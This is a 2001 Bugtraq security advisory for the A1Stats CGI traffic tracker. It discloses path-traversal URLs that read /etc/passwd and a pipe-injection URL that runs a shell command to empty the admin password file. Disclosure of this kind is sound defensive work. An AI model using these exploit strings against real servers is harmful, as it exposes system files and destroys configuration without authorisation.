From: neme-dhc@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Advisory for A1Stats
Date: Mon, 7 May 2001 19:31:12 -0500

[ Advisory for A1Stats ]
[ A1Stats is made by Drummond Miles ]
[ Site: http://www.gadnet.com/a1stats ]
[ by nemesystm of the DHC ]
[ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
[ ADV-0114 ]

/-|=[explanation]=|-\
A1Stats is a CGI package to track website traffic. The package has a bug that allows arbitrary files to be viewed, and it also makes it possible to overwrite existing files.

/-|=[who is vulnerable]=|-\
Anyone using a copy of A1Stats that was downloaded before 24/04/01.

/-|=[testing it]=|-\
To test these vulnerabilities, try the following.

www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd

These two will give you /etc/passwd.

www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd

This will also give you /etc/passwd, but it will show it in a very mangled manner, as the CGI adds HTML tags to what it thinks is a file it created itself.

One can also open a file and wreck its contents.

http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|

will empty a1admin.txt. a1admin.txt contains the password to change settings of the CGI. When this file is removed, no one can log in anymore.

/-|=[fix]=|-\
Downloading the latest version will solve this problem.